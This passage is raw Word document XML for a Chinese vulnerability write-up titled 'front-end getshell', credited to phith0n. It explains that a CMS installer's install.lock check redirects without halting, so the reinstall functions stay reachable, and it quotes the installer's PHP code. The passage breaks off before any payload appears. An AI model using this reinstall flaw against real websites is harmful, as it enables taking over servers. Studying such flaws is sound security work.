          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>前台</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:spacing w:val="-88"/>
          <w:sz w:val="32"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>getshell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="321" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman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作者：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>phith0n</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="237" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="401" w:firstLine="420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安装好后发现根目录下多了一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> install.lock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，一般的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> cms </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>为了防止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lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>被重安装就会在目录下生成一个类似的文件，下次有人再访问安装脚本的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="95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lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>时候，脚本会检测，如果目录下有这个文件就提示“请删除后再安装”。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="344" w:lineRule="exact"/>
        <w:ind w:left="837" w:right="3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lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>原本应该是没有任何问题的。但我们来到安装脚本，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="417" w:right="3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lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">/app/controllers/install.php </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>中，查看它是怎么处理的：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="12"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="19"/>
          <w:lang w:eastAsia="zh-CN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0" type="#_x0000_t202" style="position:absolute;margin-left:89.85pt;margin-top:18.25pt;width:319.25pt;height:195.6pt;z-index:1144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6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class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Install extends Install_Controller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function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  construct ()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parent</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>::</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:spacing w:val="67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construct();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$this-&gt;load-&gt;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library(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'myclass');</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="71" w:line="309" w:lineRule="auto"/>
                    <w:ind w:left="1831" w:right="251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$file=FCPATH.'install.lock'; if (file_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exists(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$file)){</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="255" w:lineRule="exact"/>
                    <w:ind w:left="2748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$this-&gt;myclass-&gt;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notice(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'alert("</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>系统已安装过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")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;window.location.href</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>="'.site_url().'";');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19"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:sectPr w:rsidR="00292EF3">
          <w:footerReference w:type="default" r:id="rId18"/>
          <w:pgSz w:w="9980" w:h="14190"/>
          <w:pgMar w:top="1340" w:right="1380" w:bottom="1160" w:left="1380" w:header="0" w:footer="978" w:gutter="0"/>
          <w:pgNumType w:start="20"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="74" w:line="344" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="335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w w:val="99"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>构造函数里检查是否存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="99"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> install.lock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="99"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，然后用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="99"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> javascript </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="99"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的方式告诉</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="99"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>用户“系统已安装过”，然后跳转。但是这个脚本根本还没有结束嘛，这</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>个</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>类里的函数都可以运行，并不因为返回了一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> window.location.href </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>就停止运行。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this-&gt;myclass-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>notice(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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>中也没有停止运行的代码）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="327" w:lineRule="exact"/>
        <w:ind w:left="83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然后，在往下翻，就能看到安装的函数：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:group id="_x0000_s10353" style="position:absolute;margin-left:85.1pt;margin-top:18pt;width:328.7pt;height:458.4pt;z-index:1192;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordorigin="1702,360" coordsize="6574,9168">
            <v:rect id="_x0000_s10439" style="position:absolute;left:1717;top:375;width:6545;height:346" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10438" style="position:absolute" from="1707,370" to="8271,370" strokeweight=".48pt"/>
            <v:line id="_x0000_s10437" style="position:absolute" from="1712,365" to="1712,721" strokeweight=".48pt"/>
            <v:line id="_x0000_s10436" style="position:absolute" from="8266,375" to="8266,721" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10435" style="position:absolute;left:1717;top:721;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10434" style="position:absolute" from="1712,721" to="1712,1047" strokeweight=".48pt"/>
            <v:line id="_x0000_s10433" style="position:absolute" from="8266,721" to="8266,1047" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10432" style="position:absolute;left:1717;top:1047;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10431" style="position:absolute" from="1712,1047" to="1712,1373" strokeweight=".48pt"/>
            <v:line id="_x0000_s10430" style="position:absolute" from="8266,1047" to="8266,1373" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10429" style="position:absolute;left:1717;top:1373;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10428" style="position:absolute" from="1712,1373" to="1712,1699" strokeweight=".48pt"/>
            <v:line id="_x0000_s10427" style="position:absolute" from="8266,1373" to="8266,1699" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10426" style="position:absolute;left:1717;top:1699;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10425" style="position:absolute" from="1712,1699" to="1712,2025" strokeweight=".48pt"/>
            <v:line id="_x0000_s10424" style="position:absolute" from="8266,1699" to="8266,2025" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10423" style="position:absolute;left:1717;top:2025;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10422" style="position:absolute" from="1712,2025" to="1712,2351" strokeweight=".48pt"/>
            <v:line id="_x0000_s10421" style="position:absolute" from="8266,2025" to="8266,2351" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10420" style="position:absolute;left:1717;top:2351;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10419" style="position:absolute" from="1712,2351" to="1712,2677" strokeweight=".48pt"/>
            <v:line id="_x0000_s10418" style="position:absolute" from="8266,2351" to="8266,2677" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10417" style="position:absolute;left:1717;top:2677;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10416" style="position:absolute" from="1712,2677" to="1712,3003" strokeweight=".48pt"/>
            <v:line id="_x0000_s10415" style="position:absolute" from="8266,2677" to="8266,3003" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10414" style="position:absolute;left:1717;top:3003;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10413" style="position:absolute" from="1712,3003" to="1712,3329" strokeweight=".48pt"/>
            <v:line id="_x0000_s10412" style="position:absolute" from="8266,3003" to="8266,3329" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10411" style="position:absolute;left:1717;top:3329;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10410" style="position:absolute" from="1712,3329" to="1712,3655" strokeweight=".48pt"/>
            <v:line id="_x0000_s10409" style="position:absolute" from="8266,3329" to="8266,3655" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10408" style="position:absolute;left:1717;top:3655;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10407" style="position:absolute" from="1712,3655" to="1712,3981" strokeweight=".48pt"/>
            <v:line id="_x0000_s10406" style="position:absolute" from="8266,3655" to="8266,3981" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10405" style="position:absolute;left:1717;top:3981;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10404" style="position:absolute" from="1712,3981" to="1712,4307" strokeweight=".48pt"/>
            <v:line id="_x0000_s10403" style="position:absolute" from="8266,3981" to="8266,4307" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10402" style="position:absolute;left:1717;top:4307;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10401" style="position:absolute" from="1712,4307" to="1712,4633" strokeweight=".48pt"/>
            <v:line id="_x0000_s10400" style="position:absolute" from="8266,4307" to="8266,4633" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10399" style="position:absolute;left:1717;top:4633;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10398" style="position:absolute" from="1712,4633" to="1712,4959" strokeweight=".48pt"/>
            <v:line id="_x0000_s10397" style="position:absolute" from="8266,4633" to="8266,4959" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10396" style="position:absolute;left:1717;top:4959;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10395" style="position:absolute" from="1712,4959" to="1712,5285" strokeweight=".48pt"/>
            <v:line id="_x0000_s10394" style="position:absolute" from="8266,4959" to="8266,5285" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10393" style="position:absolute;left:1717;top:5285;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10392" style="position:absolute" from="1712,5285" to="1712,5611" strokeweight=".48pt"/>
            <v:line id="_x0000_s10391" style="position:absolute" from="8266,5285" to="8266,5611" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10390" style="position:absolute;left:1717;top:5611;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10389" style="position:absolute" from="1712,5611" to="1712,5937" strokeweight=".48pt"/>
            <v:line id="_x0000_s10388" style="position:absolute" from="8266,5611" to="8266,5937" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10387" style="position:absolute;left:1717;top:5937;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10386" style="position:absolute" from="1712,5937" to="1712,6263" strokeweight=".48pt"/>
            <v:line id="_x0000_s10385" style="position:absolute" from="8266,5937" to="8266,6263" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10384" style="position:absolute;left:1717;top:6263;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10383" style="position:absolute" from="1712,6263" to="1712,6589" strokeweight=".48pt"/>
            <v:line id="_x0000_s10382" style="position:absolute" from="8266,6263" to="8266,6589" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10381" style="position:absolute;left:1717;top:6589;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10380" style="position:absolute" from="1712,6589" to="1712,6915" strokeweight=".48pt"/>
            <v:line id="_x0000_s10379" style="position:absolute" from="8266,6589" to="8266,6915" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10378" style="position:absolute;left:1717;top:6915;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10377" style="position:absolute" from="1712,6915" to="1712,7241" strokeweight=".48pt"/>
            <v:line id="_x0000_s10376" style="position:absolute" from="8266,6915" to="8266,7241" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10375" style="position:absolute;left:1717;top:7241;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10374" style="position:absolute" from="1712,7241" to="1712,7567" strokeweight=".48pt"/>
            <v:line id="_x0000_s10373" style="position:absolute" from="8266,7241" to="8266,7567" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10372" style="position:absolute;left:1717;top:7567;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10371" style="position:absolute" from="1712,7567" to="1712,7893" strokeweight=".48pt"/>
            <v:line id="_x0000_s10370" style="position:absolute" from="8266,7567" to="8266,7893" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10369" style="position:absolute;left:1717;top:7893;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10368" style="position:absolute" from="1712,7893" to="1712,8219" strokeweight=".48pt"/>
            <v:line id="_x0000_s10367" style="position:absolute" from="8266,7893" to="8266,8219" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10366" style="position:absolute;left:1717;top:8219;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10365" style="position:absolute" from="1712,8219" to="1712,8545" strokeweight=".48pt"/>
            <v:line id="_x0000_s10364" style="position:absolute" from="8266,8219" to="8266,8545" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10363" style="position:absolute;left:1717;top:8545;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10362" style="position:absolute" from="1712,8545" to="1712,8871" strokeweight=".48pt"/>
            <v:line id="_x0000_s10361" style="position:absolute" from="8266,8545" to="8266,8871" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10360" style="position:absolute;left:1717;top:8871;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10359" style="position:absolute" from="1712,8871" to="1712,9197" strokeweight=".48pt"/>
            <v:line id="_x0000_s10358" style="position:absolute" from="8266,8871" to="8266,9197" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10357" style="position:absolute;left:1717;top:9197;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10356" style="position:absolute" from="1712,9197" to="1712,9523" strokeweight=".48pt"/>
            <v:line id="_x0000_s10355" style="position:absolute" from="8266,9197" to="8266,9523" strokeweight=".48pt"/>
            <v:shape id="_x0000_s10354" type="#_x0000_t202" style="position:absolute;left:1712;top:370;width:6554;height:9153" filled="f" stroked="f">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="62"/>
                      <w:ind w:left="85" w:right="2232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public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 xml:space="preserve"> function step($step)</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="73"/>
                      <w:ind w:left="999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3" w:line="307" w:lineRule="auto"/>
                      <w:ind w:left="1916" w:right="2232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data[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'step']=$step; if($step==1 || $step==2){</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="4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data[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'permission']</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Vrinda"/>
                        <w:spacing w:val="-75"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                      <w:t xml:space="preserve"> </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Vrinda"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                      <w:t>=</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Vrinda"/>
                        <w:spacing w:val="-76"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                      <w:t xml:space="preserve"> </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Vrinda"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                      <w:t>$this-&gt;_checkFileRight();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$this-&gt;load-&gt;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view(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'install',$data);</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="73"/>
                      <w:ind w:left="1916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3"/>
                      <w:ind w:left="1916" w:right="2232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if(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$step==3){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$this-&gt;_install_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do(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);</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="71"/>
                      <w:ind w:left="1916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3"/>
                      <w:ind w:left="999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292EF3">
                    <w:pPr>
                      <w:spacing w:before="2"/>
                      <w:rPr>
                        <w:rFonts w:ascii="微软雅黑"/>
                        <w:sz w:val="23"/>
                      </w:rPr>
                    </w:pPr>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:ind w:left="999" w:right="2232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function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 xml:space="preserve"> _install_do()</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="73"/>
                      <w:ind w:left="999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3" w:line="307" w:lineRule="auto"/>
                      <w:ind w:left="1916" w:right="3391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data[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'step']=3; if($_POST){</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="4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$dbhost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'dbhost');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$dbport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'dbport');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$dbname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'dbname');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$dbuser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'dbuser');</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="73"/>
                      <w:ind w:left="999" w:right="2232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$dbpwd =</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="71"/>
                      <w:ind w:left="85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'dbpwd'</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Vrinda"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                      <w:t>)?$this-&gt;input-&gt;post('dbpwd'):'';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$dbprefix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'dbprefix');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$userid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'admin');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 xml:space="preserve">$pwd = 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md5(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$this-&gt;input-&gt;post('pwd'));</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="73"/>
                      <w:ind w:left="2833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$email = $this-&gt;input-&gt;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post(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'email');</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="73"/>
                      <w:ind w:left="1916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$sub_folder = '/'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.$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this-&gt;input-&gt;post('base_url').'/';</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="71"/>
                      <w:ind w:left="1916" w:right="2232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$conn =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rPr>
          <w:rFonts w:ascii="微软雅黑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7"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="8"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:pict>
          <v:group id="_x0000_s10250" style="position:absolute;margin-left:85.35pt;margin-top:71.75pt;width:328.2pt;height:554.7pt;z-index:-369736;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" coordorigin="1707,1435" coordsize="6564,11094">
            <v:rect id="_x0000_s10352" style="position:absolute;left:1717;top:1440;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10351" style="position:absolute" from="1712,1440" to="1712,1766" strokeweight=".48pt"/>
            <v:line id="_x0000_s10350" style="position:absolute" from="8266,1440" to="8266,1766" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10349" style="position:absolute;left:1717;top:1766;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10348" style="position:absolute" from="1712,1766" to="1712,2092" strokeweight=".48pt"/>
            <v:line id="_x0000_s10347" style="position:absolute" from="8266,1766" to="8266,2092" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10346" style="position:absolute;left:1717;top:2092;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10345" style="position:absolute" from="1712,2092" to="1712,2418" strokeweight=".48pt"/>
            <v:line id="_x0000_s10344" style="position:absolute" from="8266,2092" to="8266,2418" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10343" style="position:absolute;left:1717;top:2418;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10342" style="position:absolute" from="1712,2418" to="1712,2744" strokeweight=".48pt"/>
            <v:line id="_x0000_s10341" style="position:absolute" from="8266,2418" to="8266,2744" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10340" style="position:absolute;left:1717;top:2744;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10339" style="position:absolute" from="1712,2744" to="1712,3070" strokeweight=".48pt"/>
            <v:line id="_x0000_s10338" style="position:absolute" from="8266,2744" to="8266,3070" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10337" style="position:absolute;left:1717;top:3070;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10336" style="position:absolute" from="1712,3070" to="1712,3396" strokeweight=".48pt"/>
            <v:line id="_x0000_s10335" style="position:absolute" from="8266,3070" to="8266,3396" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10334" style="position:absolute;left:1717;top:3396;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10333" style="position:absolute" from="1712,3396" to="1712,3722" strokeweight=".48pt"/>
            <v:line id="_x0000_s10332" style="position:absolute" from="8266,3396" to="8266,3722" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10331" style="position:absolute;left:1717;top:3722;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10330" style="position:absolute" from="1712,3722" to="1712,4048" strokeweight=".48pt"/>
            <v:line id="_x0000_s10329" style="position:absolute" from="8266,3722" to="8266,4048" strokeweight=".48pt"/>
